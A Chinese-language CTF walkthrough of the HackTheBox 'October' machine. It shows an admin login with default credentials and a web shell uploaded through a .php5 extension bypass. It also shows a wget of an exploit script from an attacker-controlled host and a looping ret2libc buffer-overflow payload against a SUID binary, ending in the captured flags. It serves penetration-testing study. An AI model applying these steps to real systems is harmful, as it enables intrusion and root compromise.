[Meachines] [Medium] October October-CMS+BOF-ROP链自...

admin 2024年9月17日16:28:53评论10 views字数 4305阅读14分21秒阅读模式

信息收集

IP Address Opening Ports
10.10.10.16 TCP:22,80

$ nmap -p- 10.10.10.16 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_ 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: October CMS - Vanilla
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-methods:
|_ Potentially risky methods: PUT PATCH DELETE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

October-CMS

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

username:admin password:admin

Admin Login

http://10.10.10.16/backend/backend/auth/signin

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

http://10.10.10.16/backend/cms/media

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

通过上传php5后缀文件绕过

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

http://10.10.10.16/storage/app/media/p0wny.php5

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

User.txt

2e2e813cc41a0812857cb7e7cdb5daa3

权限提升 & BOF

SUID File 32Bit

www-data@october:/var/www/html/cms/storage/app/media$ find / -perm -4000 -type f 2>/dev/null

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

$ gdb -q ./ovrflw

gdb-peda$ checksec

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

  1. CANARY : disabled

    • 风险: 栈溢出攻击的风险增加。没有启用栈保护(Canary),意味着攻击者可以更容易地利用栈溢出漏洞来覆盖返回地址或其他关键数据,可能导致代码执行或控制流劫持。

  2. FORTIFY : disabled

    • 风险: 缓冲区溢出攻击的风险增加。未启用FORTIFY_SOURCE,编译时未进行额外的边界检查,因此缓冲区溢出等内存破坏漏洞更容易被利用。

  3. NX : ENABLED

    • 降低的风险: NX 已启用,意味着数据段不能被执行,减少了攻击者通过注入和执行恶意代码(如 shellcode)的可能性。这是一种有效的保护机制。

  4. PIE : disabled

    • 风险: 代码重用攻击的风险增加。未启用位置无关可执行文件(PIE),意味着二进制文件在每次加载时使用固定的地址空间布局,使得攻击者更容易预测并利用内存地址,进行如返回导向编程(ROP)的攻击。

  5. RELRO : Partial

    • 风险: 部分内存重定位攻击的风险存在。Partial RELRO 仅对部分重定位表(如全局偏移表的一部分)提供保护,攻击者可能仍然可以通过覆盖未保护的 GOT 表项来劫持程序的控制流。

www-data@october:/var/www/html/cms/storage/app/media$ cat /proc/sys/kernel/randomize_va_space

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

这表示系统启用了 完全地址空间布局随机化(ASLR),即最高级别的地址空间随机化。

Framework

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

Buffer Overflow && ROP

gdb-peda$ pattern_create 1000

gdb-peda$ run 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x' Starting program: /tmp/ovrflw 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

gdb-peda$ pattern_offset AA8A

偏移量112

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

www-data@october:/tmp$ ./rops.sh /usr/local/bin/ovrflw

https://github.com/MartinxMax/ROPS

ROP链自动构造,由于启用了ASLR,所以libc地址是变化的。所以我们需要循环尝试payload

www-data@october:/tmp$ wget http://10.10.16.17/rops.sh;chmod +x rops.sh

www-data@october:/tmp$ ./rops.sh /usr/local/bin/ovrflw

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

www-data@october:/tmp$ while true; do /usr/local/bin/ovrflw $(python -c 'print "x90"*112 + "x10x83x63xb7" + "x60xb2x62xb7" + "xacxabx75xb7"'); done

[Meachines] [Medium] October October-CMS+BOF-ROP链自...

Root.txt

85319abefab83f503bc66023fa1c3e42

作者:maptnh

链接:[Meachines] [Medium] October October-CMS+BOF-ROP链自... - FreeBuf网络安全行业门户

原文始发于微信公众号(船山信安):[Meachines] [Medium] October October-CMS+BOF-ROP链自...

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月17日16:28:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [Meachines] [Medium] October October-CMS+BOF-ROP链自...http://cn-sec.com/archives/3176139.html

发表评论

匿名网友 填写信息